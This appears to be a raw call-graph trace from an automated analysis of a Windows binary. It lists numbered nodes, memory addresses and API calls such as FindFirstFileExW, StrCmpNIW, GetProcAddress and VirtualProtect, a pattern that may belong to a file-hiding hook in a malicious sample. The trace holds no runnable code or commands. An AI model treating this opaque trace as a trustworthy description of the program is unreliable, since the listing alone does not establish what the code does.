SetLastError 7634->7636 7638 22f4b92cb87 7634->7638 7639 22f4b92c940 _invalid_parameter_noinfo 11 API calls 7634->7639 7635 22f4b92cb54 7635->7626 7636->7635 7637->7635 7640 22f4b92c940 _invalid_parameter_noinfo 11 API calls 7637->7640 7638->7636 7639->7638 7640->7635 7642 22f4b92c966 7641->7642 7643 22f4b92c96c SetLastError 7642->7643 7659 22f4b92d220 7642->7659 7644 22f4b92c9e5 7643->7644 7644->7629 7647 22f4b92c9a5 FlsSetValue 7650 22f4b92c9b1 FlsSetValue 7647->7650 7651 22f4b92c9c8 7647->7651 7648 22f4b92c995 FlsSetValue 7666 22f4b92d2a0 7648->7666 7654 22f4b92d2a0 __free_lconv_mon 7 API calls 7650->7654 7672 22f4b92c758 7651->7672 7656 22f4b92c9c6 SetLastError 7654->7656 7656->7644 7665 22f4b92d231 _invalid_parameter_noinfo 7659->7665 7660 22f4b92d282 7680 22f4b92d1f4 7660->7680 7661 22f4b92d266 HeapAlloc 7663 22f4b92c987 7661->7663 7661->7665 7663->7647 7663->7648 7665->7660 7665->7661 7677 22f4b92b470 7665->7677 7667 22f4b92d2a5 HeapFree 7666->7667 7668 22f4b92c9a3 7666->7668 7667->7668 7669 22f4b92d2c0 GetLastError 7667->7669 7668->7643 7670 22f4b92d2cd __free_lconv_mon 7669->7670 7671 22f4b92d1f4 __std_exception_copy 11 API calls 7670->7671 7671->7668 7689 22f4b92c630 7672->7689 7683 22f4b92b4c0 7677->7683 7681 22f4b92cb10 __std_exception_copy 13 API calls 7680->7681 7682 22f4b92d1fd 7681->7682 7682->7663 7688 22f4b92c558 EnterCriticalSection 7683->7688 7701 22f4b92c558 EnterCriticalSection 7689->7701 7703 22f4b9227e8 7704 22f4b922867 7703->7704 7705 22f4b9228c9 GetFileType 7704->7705 7717 22f4b922998 7704->7717 7706 22f4b9228d7 StrCpyW 7705->7706 7707 22f4b9228ed 7705->7707 7708 22f4b9228fc 7706->7708 7719 22f4b921ad4 GetFinalPathNameByHandleW 7707->7719 7712 22f4b92299d 7708->7712 7716 22f4b922906 7708->7716 7710 22f4b923f88 StrCmpNIW 7710->7712 7712->7710 7713 22f4b923708 4 API calls 7712->7713 7714 22f4b921dd4 2 API calls 7712->7714 7712->7717 7713->7712 7714->7712 7716->7717 7724 22f4b923f88 7716->7724 7727 22f4b923708 StrCmpIW 7716->7727 7731 22f4b921dd4 7716->7731 7720 22f4b921b3d 7719->7720 7721 22f4b921afe StrCmpNIW 7719->7721 7720->7708 7721->7720 7722 22f4b921b18 lstrlenW 7721->7722 7722->7720 7723 22f4b921b2a StrCpyW 7722->7723 7723->7720 7725 22f4b923f95 StrCmpNIW 7724->7725 7726 22f4b923faa 7724->7726 7725->7726 7726->7716 7728 22f4b923751 PathCombineW 7727->7728 7729 22f4b92373a StrCpyW StrCatW 7727->7729 7730 22f4b92375a 7728->7730 7729->7730 7730->7716 7732 22f4b921df4 7731->7732 7733 22f4b921deb 7731->7733 7732->7716 7734 22f4b921530 2 API calls 7733->7734 7734->7732 8557 22f4b92acec 8560 22f4b9290c0 8557->8560 8559 22f4b92ad15 8561 22f4b929116 8560->8561 8562 22f4b9290e1 8560->8562 8561->8559 8562->8561 8564 22f4b92c328 8562->8564 8565 22f4b92c33f 8564->8565 8566 22f4b92c335 8564->8566 8567 22f4b92d1f4 __std_exception_copy 13 API calls 8565->8567 8566->8565 8571 22f4b92c35a 8566->8571 8568 22f4b92c346 8567->8568 8569 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8568->8569 8570 22f4b92c352 8569->8570 8570->8561 8571->8570 8572 22f4b92d1f4 __std_exception_copy 13 API calls 8571->8572 8572->8568 7735 22f4b9319d0 7738 22f4b92e864 7735->7738 7739 22f4b92e871 7738->7739 7743 22f4b92e8b6 7738->7743 7744 22f4b92cacc 7739->7744 7741 22f4b92e8a0 7749 22f4b92e53c 7741->7749 7745 22f4b92cae8 FlsGetValue 7744->7745 7747 22f4b92cae4 7744->7747 7745->7747 7746 22f4b92cafe 7746->7741 7747->7746 7748 22f4b92c940 _invalid_parameter_noinfo 13 API calls 7747->7748 7748->7746 7772 22f4b92e7ac 7749->7772 7756 22f4b92e5a7 7757 22f4b92d2a0 __free_lconv_mon 13 API calls 7756->7757 7771 22f4b92e58e 7757->7771 7758 22f4b92e5b6 7758->7758 7798 22f4b92e8e0 7758->7798 7761 22f4b92e6b2 7762 22f4b92d1f4 __std_exception_copy 13 API calls 7761->7762 7764 22f4b92e6b7 7762->7764 7763 22f4b92e6cc 7765 22f4b92e70d 7763->7765 7768 22f4b92d2a0 __free_lconv_mon 13 API calls 7763->7768 7767 22f4b92d2a0 __free_lconv_mon 13 API calls 7764->7767 7766 22f4b92e774 7765->7766 7809 22f4b92e05c 7765->7809 7770 22f4b92d2a0 __free_lconv_mon 13 API calls 7766->7770 7767->7771 7768->7765 7770->7771 7771->7743 7773 22f4b92e7cf 7772->7773 7778 22f4b92e7d9 7773->7778 7824 22f4b92c558 EnterCriticalSection 7773->7824 7779 22f4b92e571 7778->7779 7781 22f4b92cacc 14 API calls 7778->7781 7784 22f4b92e22c 7779->7784 7782 22f4b92e8a0 7781->7782 7783 22f4b92e53c 56 API calls 7782->7783 7783->7779 7825 22f4b92dd78 7784->7825 7787 22f4b92e25e 7789 22f4b92e273 7787->7789 7790 22f4b92e263 GetACP 7787->7790 7788 22f4b92e24c GetOEMCP 7788->7789 7789->7771 7791 22f4b92c5d0 7789->7791 7790->7789 7792 22f4b92c61b 7791->7792 7796 22f4b92c5df _invalid_parameter_noinfo 7791->7796 7794 22f4b92d1f4 __std_exception_copy 13 API calls 7792->7794 7793 22f4b92c602 HeapAlloc 7795 22f4b92c619 7793->7795 7793->7796 7794->7795 7795->7756 7795->7758 7796->7792 7796->7793 7797 22f4b92b470 _invalid_parameter_noinfo 2 API calls 7796->7797 7797->7796 7799 22f4b92e22c 16 API calls 7798->7799 7800 22f4b92e91b 7799->7800 7801 22f4b92ea71 7800->7801 7803 22f4b92e958 IsValidCodePage 7800->7803 7808 22f4b92e972 7800->7808 7802 22f4b928070 _invalid_parameter_noinfo 8 API calls 7801->7802 7804 22f4b92e6a9 7802->7804 7803->7801 7805 22f4b92e969 7803->7805 7804->7761 7804->7763 7806 22f4b92e998 GetCPInfo 7805->7806 7805->7808 7806->7801 7806->7808 7854 22f4b92e344 7808->7854 7952 22f4b92c558 EnterCriticalSection 7809->7952 7826 22f4b92dd97 7825->7826 7827 22f4b92dd9c 7825->7827 7826->7787 7826->7788 7827->7826 7828 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 7827->7828 7829 22f4b92ddb7 7828->7829 7833 22f4b92ffb4 7829->7833 7834 22f4b92ddda 7833->7834 7835 22f4b92ffc9 7833->7835 7837 22f4b930020 7834->7837 7835->7834 7841 22f4b930a40 7835->7841 7838 22f4b930035 7837->7838 7839 22f4b930048 7837->7839 7838->7839 7851 22f4b92e8c4 7838->7851 7839->7826 7842 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 7841->7842 7843 22f4b930a4f 7842->7843 7849 22f4b930a95 7843->7849 7850 22f4b92c558 EnterCriticalSection 7843->7850 7849->7834 7852 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 7851->7852 7853 22f4b92e8cd 7852->7853 7855 22f4b92e38f GetCPInfo 7854->7855 7864 22f4b92e485 7854->7864 7860 22f4b92e3a2 7855->7860 7855->7864 7856 22f4b928070 _invalid_parameter_noinfo 8 API calls 7858 22f4b92e524 7856->7858 7858->7801 7865 22f4b931474 7860->7865 7864->7856 7866 22f4b92dd78 14 API calls 7865->7866 7867 22f4b9314b6 7866->7867 7885 22f4b92ec58 7867->7885 7887 22f4b92ec61 MultiByteToWideChar 7885->7887 8230 22f4b93494f 8231 22f4b934968 8230->8231 8232 22f4b93495e 8230->8232 8234 22f4b92c5ac LeaveCriticalSection 8232->8234 8576 22f4b92b0d4 8578 22f4b92b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8576->8578 8577 22f4b92b0fb 8579 22f4b929324 __CxxCallCatchBlock 9 API calls 8577->8579 8578->8577 8581 22f4b92b10b __FrameHandler3::GetHandlerSearchState 8578->8581 8583 22f4b9299cc 9 API calls Is_bad_exception_allowed 8578->8583 8585 22f4b9299f4 8578->8585 8580 22f4b92b100 8579->8580 8580->8581 8582 22f4b929324 __CxxCallCatchBlock 9 API calls 8580->8582 8582->8581 8583->8578 8586 22f4b929324 __CxxCallCatchBlock 9 API calls 8585->8586 8587 22f4b929a02 8586->8587 8587->8578 8808 22f4b922e54 8810 22f4b922ea8 8808->8810 8809 22f4b922ec3 8810->8809 8812 22f4b9237f4 8810->8812 8813 22f4b92388a 8812->8813 8816 22f4b923819 8812->8816 8813->8809 8814 22f4b923f88 StrCmpNIW 8814->8816 8815 22f4b921e08 StrCmpIW StrCmpW 8815->8816 8816->8813 8816->8814 8816->8815 7953 22f4b92c1d8 7954 22f4b92c1f1 7953->7954 7955 22f4b92c209 7953->7955 7954->7955 7956 22f4b92d2a0 __free_lconv_mon 13 API calls 7954->7956 7956->7955 8817 22f4b92d658 8818 22f4b92d67d 8817->8818 8822 22f4b92d694 8817->8822 8819 22f4b92d1f4 __std_exception_copy 13 API calls 8818->8819 8821 22f4b92d682 8819->8821 8820 22f4b92d724 8825 22f4b92bb54 13 API calls 8820->8825 8823 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8821->8823 8822->8820 8832 22f4b92d7b6 8822->8832 8834 22f4b92d6da 8822->8834 8850 22f4b92d894 8822->8850 8912 22f4b92da18 8822->8912 8824 22f4b92d68d 8823->8824 8826 22f4b92d77c 8825->8826 8828 22f4b92d784 8826->8828 8838 22f4b92d7d7 8826->8838 8831 22f4b92d2a0 __free_lconv_mon 13 API calls 8828->8831 8830 22f4b92d836 8833 22f4b92d2a0 __free_lconv_mon 13 API calls 8830->8833 8835 22f4b92d78b 8831->8835 8837 22f4b92d6fd 8832->8837 8841 22f4b92d2a0 __free_lconv_mon 13 API calls 8832->8841 8836 22f4b92d841 8833->8836 8834->8837 8842 22f4b92d2a0 __free_lconv_mon 13 API calls 8834->8842 8835->8837 8843 22f4b92d2a0 __free_lconv_mon 13 API calls 8835->8843 8840 22f4b92d85a 8836->8840 8844 22f4b92d2a0 __free_lconv_mon 13 API calls 8836->8844 8839 22f4b92d2a0 __free_lconv_mon 13 API calls 8837->8839 8838->8830 8838->8838 8847 22f4b92d87c 8838->8847 8949 22f4b930eb8 8838->8949 8839->8824 8845 22f4b92d2a0 __free_lconv_mon 13 API calls 8840->8845 8841->8832 8842->8834 8843->8835 8844->8836 8845->8824 8848 22f4b92d06c _invalid_parameter_noinfo 17 API calls 8847->8848 8849 22f4b92d891 8848->8849 8851 22f4b92d8c2 8850->8851 8851->8851 8852 22f4b92d8de 8851->8852 8853 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8851->8853 8852->8822 8854 22f4b92d90d 8853->8854 8855 22f4b92d926 8854->8855 8856 22f4b930eb8 38 API calls 8854->8856 8857 22f4b930eb8 38 API calls 8855->8857 8859 22f4b92d9fc 8855->8859 8856->8855 8858 22f4b92d943 8857->8858 8858->8859 8860 22f4b92d97f 8858->8860 8862 22f4b92d962 8858->8862 8863 22f4b92d98d 8858->8863 8861 22f4b92d06c _invalid_parameter_noinfo 17 API calls 8859->8861 8865 22f4b92d2a0 __free_lconv_mon 13 API calls 8860->8865 8873 22f4b92da17 8861->8873 8864 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8862->8864 8866 22f4b92d977 8863->8866 8958 22f4b92eee0 8863->8958 8868 22f4b92d96d 8864->8868 8865->8859 8866->8860 8867 22f4b92d2a0 __free_lconv_mon 13 API calls 8866->8867 8867->8860 8871 22f4b92d2a0 __free_lconv_mon 13 API calls 8868->8871 8870 22f4b92da7a 8875 22f4b92da8c 8870->8875 8881 22f4b92daa1 8870->8881 8871->8866 8872 22f4b92d9b5 8876 22f4b92d9d0 8872->8876 8877 22f4b92d9ba 8872->8877 8873->8870 8967 22f4b9313d8 8873->8967 8879 22f4b92d894 52 API calls 8875->8879 8878 22f4b92d2a0 __free_lconv_mon 13 API calls 8876->8878 8880 22f4b92d2a0 __free_lconv_mon 13 API calls 8877->8880 8878->8860 8894 22f4b92da9c 8879->8894 8880->8866 8883 22f4b92dd78 14 API calls 8881->8883 8882 22f4b928070 _invalid_parameter_noinfo 8 API calls 8884 22f4b92dd64 8882->8884 8885 22f4b92db0b 8883->8885 8884->8822 8886 22f4b92db1a 8885->8886 8887 22f4b92f198 9 API calls 8885->8887 8976 22f4b92d30c 8886->8976 8887->8886 8890 22f4b92dba8 8891 22f4b92d894 52 API calls 8890->8891 8892 22f4b92dbb8 8891->8892 8892->8894 8895 22f4b92d2a0 __free_lconv_mon 13 API calls 8892->8895 8893 22f4b92dd78 14 API calls 8899 22f4b92dbd2 8893->8899 8894->8882 8895->8894 8896 22f4b92f198 9 API calls 8896->8899 8898 22f4b92d894 52 API calls 8898->8899 8899->8893 8899->8896 8899->8898 8900 22f4b92dcc8 FindNextFileW 8899->8900 8901 22f4b92dd2a 8899->8901 8907 22f4b92d2a0 13 API calls __free_lconv_mon 8899->8907 8998 22f4b92d4ac 8899->8998 8900->8899 8902 22f4b92dce0 8900->8902 8904 22f4b92dd38 FindClose 8901->8904 8905 22f4b92d2a0 __free_lconv_mon 13 API calls 8901->8905 8903 22f4b92dd0c FindClose 8902->8903 9020 22f4b930b20 8902->9020 8903->8894 8909 22f4b92dd1c 8903->8909 8904->8894 8906 22f4b92dd48 8904->8906 8905->8904 8910 22f4b92d2a0 __free_lconv_mon 13 API calls 8906->8910 8907->8899 8911 22f4b92d2a0 __free_lconv_mon 13 API calls 8909->8911 8910->8894 8911->8894 8913 22f4b92da7a 8912->8913 8914 22f4b92da58 8912->8914 8916 22f4b92da8c 8913->8916 8919 22f4b92daa1 8913->8919 8914->8913 8915 22f4b9313d8 38 API calls 8914->8915 8915->8914 8917 22f4b92d894 56 API calls 8916->8917 8918 22f4b92da9c 8917->8918 8920 22f4b928070 _invalid_parameter_noinfo 8 API calls 8918->8920 8921 22f4b92dd78 14 API calls 8919->8921 8922 22f4b92dd64 8920->8922 8923 22f4b92db0b 8921->8923 8922->8822 8924 22f4b92db1a 8923->8924 8925 22f4b92f198 9 API calls 8923->8925 8926 22f4b92d30c 16 API calls 8924->8926 8925->8924 8927 22f4b92db7b FindFirstFileExW 8926->8927 8928 22f4b92dba8 8927->8928 8936 22f4b92dbd2 8927->8936 8929 22f4b92d894 56 API calls 8928->8929 8930 22f4b92dbb8 8929->8930 8930->8918 8932 22f4b92d2a0 __free_lconv_mon 13 API calls 8930->8932 8931 22f4b92dd78 14 API calls 8931->8936 8932->8918 8933 22f4b92f198 9 API calls 8933->8936 8934 22f4b92d4ac 16 API calls 8934->8936 8935 22f4b92d894 56 API calls 8935->8936 8936->8931 8936->8933 8936->8934 8936->8935 8937 22f4b92dcc8 FindNextFileW 8936->8937 8938 22f4b92dd2a 8936->8938 8944 22f4b92d2a0 13 API calls __free_lconv_mon 8936->8944 8937->8936 8939 22f4b92dce0 8937->8939 8941 22f4b92dd38 FindClose 8938->8941 8942 22f4b92d2a0 __free_lconv_mon 13 API calls 8938->8942 8940 22f4b92dd0c FindClose 8939->8940 8945 22f4b930b20 38 API calls 8939->8945 8940->8918 8946 22f4b92dd1c 8940->8946 8941->8918 8943 22f4b92dd48 8941->8943 8942->8941 8947 22f4b92d2a0 __free_lconv_mon 13 API calls 8943->8947 8944->8936 8945->8940 8948 22f4b92d2a0 __free_lconv_mon 13 API calls 8946->8948 8947->8918 8948->8918 8952 22f4b930ed5 8949->8952 8950 22f4b930eda 8951 22f4b92d1f4 __std_exception_copy 13 API calls 8950->8951 8955 22f4b930ef0 8950->8955 8957 22f4b930ee4 8951->8957 8952->8950 8954 22f4b930f24 8952->8954 8952->8955 8953 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8953->8955 8954->8955 8956 22f4b92d1f4 __std_exception_copy 13 API calls 8954->8956 8955->8838 8956->8957 8957->8953 8959 22f4b92ef02 8958->8959 8960 22f4b92ef1f 8958->8960 8959->8960 8961 22f4b92ef10 8959->8961 8962 22f4b92ef29 8960->8962 9028 22f4b9319f0 8960->9028 8963 22f4b92d1f4 __std_exception_copy 13 API calls 8961->8963 9035 22f4b931a40 8962->9035 8966 22f4b92ef15 8963->8966 8966->8872 8968 22f4b9313e0 8967->8968 8969 22f4b9313f5 8968->8969 8971 22f4b93140e 8968->8971 8970 22f4b92d1f4 __std_exception_copy 13 API calls 8969->8970 8972 22f4b9313fa 8970->8972 8974 22f4b92dd78 14 API calls 8971->8974 8975 22f4b931405 8971->8975 8973 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8972->8973 8973->8975 8974->8975 8975->8873 8977 22f4b92d336 8976->8977 8978 22f4b92d35a 8976->8978 8981 22f4b92d2a0 __free_lconv_mon 13 API calls 8977->8981 8983 22f4b92d345 FindFirstFileExW 8977->8983 8979 22f4b92d3bf 8978->8979 8980 22f4b92d35f 8978->8980 8982 22f4b92ec58 MultiByteToWideChar 8979->8982 8980->8983 8985 22f4b92d374 8980->8985 8987 22f4b92d2a0 __free_lconv_mon 13 API calls 8980->8987 8981->8983 8984 22f4b92d3db 8982->8984 8983->8890 8983->8899 8986 22f4b92d3e2 GetLastError 8984->8986 8992 22f4b92d413 8984->8992 8996 22f4b92d2a0 __free_lconv_mon 13 API calls 8984->8996 8997 22f4b92d420 8984->8997 8988 22f4b92c5d0 14 API calls 8985->8988 8989 22f4b92d184 13 API calls 8986->8989 8987->8985 8988->8983 8991 22f4b92d3ef 8989->8991 8990 22f4b92ec58 MultiByteToWideChar 8994 22f4b92d47a 8990->8994 8995 22f4b92d1f4 __std_exception_copy 13 API calls 8991->8995 8993 22f4b92c5d0 14 API calls 8992->8993 8993->8997 8994->8983 8994->8986 8995->8983 8996->8992 8997->8983 8997->8990 8999 22f4b92d4d6 8998->8999 9000 22f4b92d4fa 8998->9000 9003 22f4b92d2a0 __free_lconv_mon 13 API calls 8999->9003 9007 22f4b92d4e5 8999->9007 9001 22f4b92d500 9000->9001 9002 22f4b92d55f 9000->9002 9005 22f4b92d515 9001->9005 9001->9007 9008 22f4b92d2a0 __free_lconv_mon 13 API calls 9001->9008 9004 22f4b92ece8 WideCharToMultiByte 9002->9004 9003->9007 9014 22f4b92d583 9004->9014 9009 22f4b92c5d0 14 API calls 9005->9009 9006 22f4b92d58a GetLastError 9010 22f4b92d184 13 API calls 9006->9010 9007->8899 9008->9005 9009->9007 9013 22f4b92d597 9010->9013 9011 22f4b92d5c7 9011->9007 9012 22f4b92ece8 WideCharToMultiByte 9011->9012 9017 22f4b92d629 9012->9017 9018 22f4b92d1f4 __std_exception_copy 13 API calls 9013->9018 9014->9006 9014->9011 9015 22f4b92d5bb 9014->9015 9019 22f4b92d2a0 __free_lconv_mon 13 API calls 9014->9019 9016 22f4b92c5d0 14 API calls 9015->9016 9016->9011 9017->9006 9017->9007 9018->9007 9019->9015 9021 22f4b930b52 9020->9021 9022 22f4b92d1f4 __std_exception_copy 13 API calls 9021->9022 9027 22f4b930b67 9021->9027 9023 22f4b930b5c 9022->9023 9024 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9023->9024 9024->9027 9025 22f4b928070 _invalid_parameter_noinfo 8 API calls 9026 22f4b930ea8 9025->9026 9026->8903 9027->9025 9029 22f4b931a12 HeapSize 9028->9029 9030 22f4b9319f9 9028->9030 9031 22f4b92d1f4 __std_exception_copy 13 API calls 9030->9031 9032 22f4b9319fe 9031->9032 9033 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9032->9033 9034 22f4b931a09 9033->9034 9034->8962 9036 22f4b931a5f 9035->9036 9037 22f4b931a55 9035->9037 9039 22f4b931a64 9036->9039 9045 22f4b931a6b _invalid_parameter_noinfo 9036->9045 9038 22f4b92c5d0 14 API calls 9037->9038 9043 22f4b931a5d 9038->9043 9040 22f4b92d2a0 __free_lconv_mon 13 API calls 9039->9040 9040->9043 9041 22f4b931a71 9044 22f4b92d1f4 __std_exception_copy 13 API calls 9041->9044 9042 22f4b931a9e HeapReAlloc 9042->9043 9042->9045 9043->8966 9044->9043 9045->9041 9045->9042 9046 22f4b92b470 _invalid_parameter_noinfo 2 API calls 9045->9046 9046->9045 8588 22f4b922ed8 8590 22f4b922f35 8588->8590 8589 22f4b922f50 8590->8589 8591 22f4b9238a8 3 API calls 8590->8591 8591->8589 9047 22f4b93485e 9048 22f4b929324 __CxxCallCatchBlock 9 API calls 9047->9048 9049 22f4b93486c 9048->9049 9050 22f4b934877 9049->9050 9051 22f4b929324 __CxxCallCatchBlock 9 API calls 9049->9051 9051->9050 8592 22f4b92f6dc 8593 22f4b92f6e8 8592->8593 8594 22f4b92f70f 8593->8594 8596 22f4b931c0c 8593->8596 8597 22f4b931c11 8596->8597 8598 22f4b931c4c 8596->8598 8599 22f4b931c32 DeleteCriticalSection 8597->8599 8600 22f4b931c44 8597->8600 8598->8593 8599->8599 8599->8600 8601 22f4b92d2a0 __free_lconv_mon 13 API calls 8600->8601 8601->8598 7957 22f4b9225dc 7959 22f4b92265a 7957->7959 7958 22f4b922777 7959->7958 7960 22f4b9226bf GetFileType 7959->7960 7961 22f4b9226e1 7960->7961 7962 22f4b9226cd StrCpyW 7960->7962 7963 22f4b921ad4 4 API calls 7961->7963 7966 22f4b9226ee 7962->7966 7963->7966 7964 22f4b923f88 StrCmpNIW 7964->7966 7965 22f4b923708 4 API calls 7965->7966 7966->7958 7966->7964 7966->7965 7967 22f4b921dd4 2 API calls 7966->7967 7967->7966 8235 22f4b92c180 8238 22f4b92bf38 8235->8238 8245 22f4b92bf00 8238->8245 8246 22f4b92bf10 8245->8246 8247 22f4b92bf15 8245->8247 8248 22f4b92bebc 13 API calls 8246->8248 8249 22f4b92bf1c 8247->8249 8248->8247 8250 22f4b92bf31 8249->8250 8251 22f4b92bf2c 8249->8251 8253 22f4b92bebc 8250->8253 8252 22f4b92bebc 13 API calls 8251->8252 8252->8250 8254 22f4b92bec1 8253->8254 8255 22f4b92bef2 8253->8255 8256 22f4b92beea 8254->8256 8258 22f4b92d2a0 __free_lconv_mon 13 API calls 8254->8258 8257 22f4b92d2a0 __free_lconv_mon 13 API calls 8256->8257 8257->8255 8258->8254 8602 22f4b922300 8603 22f4b922331 8602->8603 8604 22f4b922447 8603->8604 8610 22f4b922355 8603->8610 8611 22f4b922412 8603->8611 8605 22f4b9224bb 8604->8605 8606 22f4b92244c 8604->8606 8608 22f4b9235c8 11 API calls 8605->8608 8605->8611 8619 22f4b9235c8 GetProcessHeap HeapAlloc 8606->8619 8608->8611 8609 22f4b92238d StrCmpNIW 8609->8610 8610->8609 8610->8611 8613 22f4b921d30 8610->8613 8614 22f4b921db4 8613->8614 8615 22f4b921d57 GetProcessHeap HeapAlloc 8613->8615 8614->8610 8615->8614 8616 22f4b921d92 8615->8616 8617 22f4b921cfc 2 API calls 8616->8617 8618 22f4b921d9a GetProcessHeap HeapFree 8617->8618 8618->8614 8624 22f4b92361b 8619->8624 8620 22f4b9236d9 GetProcessHeap HeapFree 8620->8611 8621 22f4b9236d4 8621->8620 8622 22f4b923666 StrCmpNIW 8622->8624 8623 22f4b921d30 6 API calls 8623->8624 8624->8620 8624->8621 8624->8622 8624->8623 8625 22f4b92b500 8630 22f4b92c558 EnterCriticalSection 8625->8630 9060 22f4b925c8d 9061 22f4b925c94 9060->9061 9062 22f4b925cfb 9061->9062 9063 22f4b925d77 VirtualProtect 9061->9063 9064 22f4b925db1 9063->9064 9065 22f4b925da3 GetLastError 9063->9065 9065->9064 7968 22f4b92820c 7975 22f4b928f34 7968->7975 7971 22f4b928219 7984 22f4b929340 7975->7984 7978 22f4b92c288 7979 22f4b92cb10 __std_exception_copy 13 API calls 7978->7979 7980 22f4b928222 7979->7980 7980->7971 7981 22f4b928f48 7980->7981 8009 22f4b9292dc 7981->8009 7983 22f4b928f51 7983->7971 7985 22f4b92935f GetLastError 7984->7985 7986 22f4b928215 7984->7986 7996 22f4b929c8c 7985->7996 7986->7971 7986->7978 8000 22f4b929aac 7996->8000 8001 22f4b929b96 TlsGetValue 8000->8001 8006 22f4b929af0 __vcrt_FlsAlloc 8000->8006 8002 22f4b929b1e LoadLibraryExW 8004 22f4b929b3f GetLastError 8002->8004 8005 22f4b929bbd 8002->8005 8003 22f4b929bdd GetProcAddress 8003->8001 8004->8006 8005->8003 8007 22f4b929bd4 FreeLibrary 8005->8007 8006->8001 8006->8002 8006->8003 8008 22f4b929b61 LoadLibraryExW 8006->8008 8007->8003 8008->8005 8008->8006 8010 22f4b9292ed 8009->8010 8014 22f4b929302 8009->8014 8011 22f4b929c8c __CxxCallCatchBlock 6 API calls 8010->8011 8012 22f4b9292f2 8011->8012 8015 22f4b929cd4 8012->8015 8014->7983 8016 22f4b929aac __vcrt_FlsAlloc 5 API calls 8015->8016 8017 22f4b929d02 8016->8017 8018 22f4b929d14 TlsSetValue 8017->8018 8019 22f4b929d0c 8017->8019 8018->8019 8019->8014 8631 22f4b928f0c 8638 22f4b92946c 8631->8638 8634 22f4b928f19 8639 22f4b929474 8638->8639 8641 22f4b9294a5 8639->8641 8642 22f4b928f15 8639->8642 8655 22f4b929d28 8639->8655 8643 22f4b9294b4 __vcrt_uninitialize_locks DeleteCriticalSection 8641->8643 8642->8634 8644 22f4b929400 8642->8644 8643->8642 8660 22f4b929bfc 8644->8660 8656 22f4b929aac __vcrt_FlsAlloc 5 API calls 8655->8656 8657 22f4b929d5e 8656->8657 8658 22f4b929d73 InitializeCriticalSectionAndSpinCount 8657->8658 8659 22f4b929d68 8657->8659 8658->8659 8659->8639 8661 22f4b929aac __vcrt_FlsAlloc 5 API calls 8660->8661 8662 22f4b929c21 TlsAlloc 8661->8662 9066 22f4b928672 9067 22f4b9290c0 __std_exception_copy 38 API calls 9066->9067 9068 22f4b92869d 9067->9068 8259 22f4b92f370 VirtualProtect 9069 22f4b92f870 9070 22f4b92f8a0 9069->9070 9072 22f4b92f8c7 9069->9072 9071 22f4b92cb10 __std_exception_copy 13 API calls 9070->9071 9070->9072 9076 22f4b92f8b4 9070->9076 9071->9076 9073 22f4b92f99c 9072->9073 9092 22f4b92c558 EnterCriticalSection 9072->9092 9075 22f4b92fa03 9073->9075 9077 22f4b92fab3 9073->9077 9078 22f4b92f9ca 9073->9078 9091 22f4b92fa61 9075->9091 9093 22f4b92c5ac LeaveCriticalSection 9075->9093 9076->9072 9079 22f4b92f949 9076->9079 9088 22f4b92f904 9076->9088 9080 22f4b92fac0 9077->9080 9094 22f4b92c5ac LeaveCriticalSection 9077->9094 9078->9075 9087 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 9078->9087 9081 22f4b92d1f4 __std_exception_copy 13 API calls 9079->9081 9084 22f4b92f94e 9081->9084 9086 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9084->9086 9085 22f4b92cab0 14 API calls _invalid_parameter_noinfo 9085->9091 9086->9088 9089 22f4b92f9f3 9087->9089 9090 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 9089->9090 9090->9075 9091->9085 8020 22f4b922ff0 8021 22f4b923061 8020->8021 8022 22f4b923384 8021->8022 8023 22f4b92308d GetModuleHandleA 8021->8023 8024 22f4b9230b1 8023->8024 8025 22f4b92309f GetProcAddress 8023->8025 8024->8022 8026 22f4b9230d8 StrCmpNIW 8024->8026 8025->8024 8026->8022 8027 22f4b9230fd 8026->8027 8027->8022 8028 22f4b921a30 6 API calls 8027->8028 8029 22f4b92320f lstrlenW 8027->8029 8030 22f4b9232b9 lstrlenW 8027->8030 8031 22f4b923f88 StrCmpNIW 8027->8031 8032 22f4b921cfc StrCmpIW StrCmpW 8027->8032 8028->8027 8029->8027 8030->8027 8031->8027 8032->8027 8664 22f4b9346f5 8665 22f4b929324 __CxxCallCatchBlock 9 API calls 8664->8665 8666 22f4b93470d 8665->8666 8667 22f4b929324 __CxxCallCatchBlock 9 API calls 8666->8667 8668 22f4b934728 8667->8668 8669 22f4b929324 __CxxCallCatchBlock 9 API calls 8668->8669 8670 22f4b93473c 8669->8670 8671 22f4b929324 __CxxCallCatchBlock 9 API calls 8670->8671 8672 22f4b93477e 8671->8672 8260 22f4b925974 8261 22f4b92597a 8260->8261 8272 22f4b927fa0 8261->8272 8266 22f4b925a77 8268 22f4b925bfd 8266->8268 8270 22f4b9259de 8266->8270 8285 22f4b927b80 8266->8285 8267 22f4b925cfb 8268->8267 8269 22f4b925d77 VirtualProtect 8268->8269 8269->8270 8271 22f4b925da3 GetLastError 8269->8271 8271->8270 8274 22f4b927fab 8272->8274 8273 22f4b9259bd 8273->8270 8281 22f4b924400 8273->8281 8274->8273 8275 22f4b92b470 _invalid_parameter_noinfo 2 API calls 8274->8275 8276 22f4b927fca 8274->8276 8275->8274 8277 22f4b927fd5 8276->8277 8291 22f4b9287b8 8276->8291 8295 22f4b9287d8 8277->8295 8282 22f4b92441d 8281->8282 8284 22f4b92448c 8282->8284 8304 22f4b924670 8282->8304 8284->8266 8286 22f4b927bc7 8285->8286 8329 22f4b927950 8286->8329 8289 22f4b928070 _invalid_parameter_noinfo 8 API calls 8290 22f4b927bf1 8289->8290 8290->8266 8292 22f4b9287c6 std::bad_alloc::bad_alloc 8291->8292 8299 22f4b929178 8292->8299 8294 22f4b9287d7 8296 22f4b9287e6 std::bad_alloc::bad_alloc 8295->8296 8297 22f4b929178 Concurrency::cancel_current_task 2 API calls 8296->8297 8298 22f4b927fdb 8297->8298 8300 22f4b929197 8299->8300 8301 22f4b9291e2 RaiseException 8300->8301 8302 22f4b9291c0 RtlPcToFileHeader 8300->8302 